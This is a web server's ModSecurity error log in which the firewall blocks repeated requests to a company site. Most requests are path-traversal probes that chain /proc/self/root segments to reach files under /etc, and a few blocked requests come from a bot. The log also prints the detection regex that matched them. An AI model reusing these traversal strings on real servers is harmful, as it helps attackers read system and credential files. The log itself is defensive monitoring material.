[Mon Mar 16 12:24:51.187290 2026] [:error] [pid 32654:tid 140411616036608] [client 74.7.243.203:33632] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggwwlT9VtDQc7bgUyu5wAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:24:51.415046 2026] [:error] [pid 32654:tid 140411725141760] [client 74.7.243.203:33632] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggwwlT9VtDQc7bgUyu6AAAAQI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:26:33.804570 2026] [:error] [pid 10709:tid 140411632822016] [client 74.7.228.16:32794] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abghKRXjF1vJNtV6CWrz6AAAAc0"]
[Mon Mar 16 12:26:56.783339 2026] [:error] [pid 21806:tid 140411582465792] [client 74.7.241.46:49418] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abghQNSswJuvopo3lOhcLAAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Mon Mar 16 12:28:15.007868 2026] [:error] [pid 21946:tid 140411699963648] [client 74.7.241.46:49812] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abghj3bQATo66fKoS7xNuwAAAMU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc
[Mon Mar 16 12:28:56.352799 2026] [:error] [pid 10709:tid 140411708356352] [client 74.7.244.31:34810] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abghuBXjF1vJNtV6CWr0EgAAAcQ"]
[Mon Mar 16 12:30:38.086827 2026] [:error] [pid 21533:tid 140411624429312] [client 74.7.243.203:33148] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgiHnjZBu2q05ozVU9WeAAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc
[Mon Mar 16 12:31:34.594944 2026] [:error] [pid 11972:tid 140411590858496] [client 74.7.228.16:38762] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgiVpqj1wV0Si-OkefsewAAABI"]
[Mon Mar 16 12:31:51.682863 2026] [:error] [pid 21806:tid 140411616036608] [client 74.7.243.203:58258] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgiZNSswJuvopo3lOhc_AAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc
[Mon Mar 16 12:32:26.661101 2026] [:error] [pid 10831:tid 140411699963648] [client 74.7.243.203:53928] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgiio6lpbStxTqkSktrBwAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/run/initramfs/state/etc
[Mon Mar 16 12:32:39.398552 2026] [:error] [pid 10651:tid 140411599251200] [client 74.7.243.203:51030] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgil7ysWC90G-1nBrBEFAAAAZE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:32:40.783433 2026] [:error] [pid 21806:tid 140411616036608] [client 74.7.243.203:39524] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgimNSswJuvopo3lOhdPgAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:32:42.421063 2026] [:error] [pid 10772:tid 140411649607424] [client 74.7.243.203:39530] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgimv9ocpUE4ed4uDzt3wAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:32:43.829448 2026] [:error] [pid 21533:tid 140411699963648] [client 74.7.243.203:39532] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgim3jZBu2q05ozVU9WugAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:32:49.353319 2026] [:error] [pid 10651:tid 140411716749056] [client 74.7.243.203:39538] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abginrysWC90G-1nBrBEFgAAAYM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:33:00.831590 2026] [:error] [pid 11972:tid 140411624429312] [client 74.7.243.203:45868] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgirJqj1wV0Si-OkefsmAAAAA4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:33:03.355677 2026] [:error] [pid 21946:tid 140411658000128] [client 74.7.243.203:57098] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgir3bQATo66fKoS7xN6QAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:33:07.014630 2026] [:error] [pid 10651:tid 140411557287680] [client 74.7.243.203:57112] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgis7ysWC90G-1nBrBEHAAAAZY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:33:08.370679 2026] [:error] [pid 21805:tid 140411699963648] [client 74.7.243.203:57128] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgitLABkC4fWIHEf8HpBwAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:33:12.443253 2026] [:error] [pid 21533:tid 140411649607424] [client 74.7.243.203:57130] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgiuHjZBu2q05ozVU9WwQAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:33:13.791351 2026] [:error] [pid 32654:tid 140411708356352] [client 74.7.243.203:38592] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgiuQlT9VtDQc7bgUyvxQAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:33:15.124097 2026] [:error] [pid 21946:tid 140411674785536] [client 74.7.243.203:38608] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgiu3bQATo66fKoS7xN7gAAAMg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:33:16.436448 2026] [:error] [pid 10709:tid 140411632822016] [client 74.7.243.203:38624] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgivBXjF1vJNtV6CWr0eQAAAc0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:33:17.744083 2026] [:error] [pid 21805:tid 140411548894976] [client 74.7.243.203:38638] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgivbABkC4fWIHEf8HpCAAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
